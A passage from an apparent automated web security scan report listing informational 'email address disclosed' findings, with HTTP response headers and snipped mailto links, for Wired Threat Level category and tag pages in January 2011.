Cache-Control: must-revalidate, max-age=123
Expires: Wed, 12 Jan 2011 15:33:51 GMT
Date: Wed, 12 Jan 2011 15:31:48 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 116610

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.90. http://www.wired.com/threatlevel/category/the-courts/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/the-courts/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan@ryansingel.net
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:19:52 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=113
Expires: Wed, 12 Jan 2011 15:33:42 GMT
Date: Wed, 12 Jan 2011 15:31:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 116691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.91. http://www.wired.com/threatlevel/category/the-ridiculous/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/the-ridiculous/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan@ryansingel.net
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:20:02 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=142
Expires: Wed, 12 Jan 2011 15:34:14 GMT
Date: Wed, 12 Jan 2011 15:31:52 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 116182

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.92. http://www.wired.com/threatlevel/category/threats/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/threats/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan@ryansingel.net
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:20:12 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=145
Expires: Wed, 12 Jan 2011 15:34:26 GMT
Date: Wed, 12 Jan 2011 15:32:01 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 117270

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.93. http://www.wired.com/threatlevel/category/three-strikes/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/three-strikes/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:20:20 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=87
Expires: Wed, 12 Jan 2011 15:33:30 GMT
Date: Wed, 12 Jan 2011 15:32:03 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 82575

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.94. http://www.wired.com/threatlevel/category/tsa/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/tsa/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:20:38 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=107
Expires: Wed, 12 Jan 2011 15:33:55 GMT
Date: Wed, 12 Jan 2011 15:32:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 63575

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.95. http://www.wired.com/threatlevel/category/uncategorized/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/uncategorized/

Issue detail

The following email addresses were disclosed in the response:

annalee@io9.com
david_kravets@wired.com
evan_hansen@wired.com
jacqui@arstechnica.com
john.borland@gmail.com
klp@wired.com
kpoulsen@wired.com
kzetter@wired.com
ryan@ryansingel.net
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:14:20 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=225
Expires: Wed, 12 Jan 2011 15:34:19 GMT
Date: Wed, 12 Jan 2011 15:30:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 117261

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:jacqui@arstechnica.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:annalee@io9.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:evan_hansen@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.96. http://www.wired.com/threatlevel/category/watchlists/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/watchlists/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan@ryansingel.net
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:20:46 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=52
Expires: Wed, 12 Jan 2011 15:33:09 GMT
Date: Wed, 12 Jan 2011 15:32:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 124936

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.97. http://www.wired.com/threatlevel/category/wikileaks/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/wikileaks/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kpoulsen@wired.com
kzetter@wired.com
ryan@ryansingel.net
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 12:49:59 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=304
Expires: Wed, 12 Jan 2011 15:33:17 GMT
Date: Wed, 12 Jan 2011 15:28:13 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 122533

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.98. http://www.wired.com/threatlevel/category/yo-ho-ho/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/yo-ho-ho/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
editor@wired.co.uk
jacqui@arstechnica.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:21:18 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=49
Expires: Wed, 12 Jan 2011 15:33:06 GMT
Date: Wed, 12 Jan 2011 15:32:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 109524

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:jacqui@arstechnica.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:editor@wired.co.uk">
...[SNIP]...
<a href="mailto:editor@wired.co.uk">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.99. http://www.wired.com/threatlevel/tag/4chan/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/4chan/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
gov.palin@yahoo.com
john.borland@gmail.com
klp@wired.com
kpoulsen@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:25:55 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=43
Expires: Wed, 12 Jan 2011 15:33:33 GMT
Date: Wed, 12 Jan 2011 15:32:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 120762

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
</a> that a hacker had obtained unauthorized access to Palin...s Yahoo e-mail account — gov.palin@yahoo.com — by using publicly available information to reset her password to “popcorn.” The intruder then posted screenshots of Palin’s e-mail, as well as her new password, to a forum a
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.100. http://www.wired.com/threatlevel/tag/aclu/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/aclu/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:25:56 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=48
Expires: Wed, 12 Jan 2011 15:33:46 GMT
Date: Wed, 12 Jan 2011 15:32:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 120991

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.101. http://www.wired.com/threatlevel/tag/al-haramain/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/al-haramain/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kpoulsen@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:25:58 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=1
Expires: Wed, 12 Jan 2011 15:33:03 GMT
Date: Wed, 12 Jan 2011 15:33:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 142184

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.102. http://www.wired.com/threatlevel/tag/albert-gonzalez/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/albert-gonzalez/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:32:52 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=50
Expires: Wed, 12 Jan 2011 15:33:53 GMT
Date: Wed, 12 Jan 2011 15:33:03 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 137804

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.103. http://www.wired.com/threatlevel/tag/apple-iphone/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/apple-iphone/

Issue detail

The following email addresses were disclosed in the response:

brian_x_chen@wired.com
david_kravets@wired.com
evan_hansen@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:26:15 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=429
Expires: Wed, 12 Jan 2011 15:41:36 GMT
Date: Wed, 12 Jan 2011 15:34:27 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 124521

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:brian_x_chen@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:evan_hansen@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.104. http://www.wired.com/threatlevel/tag/blackhat/ previous next

Summary

Severity:	Information
Confidence:	Certain
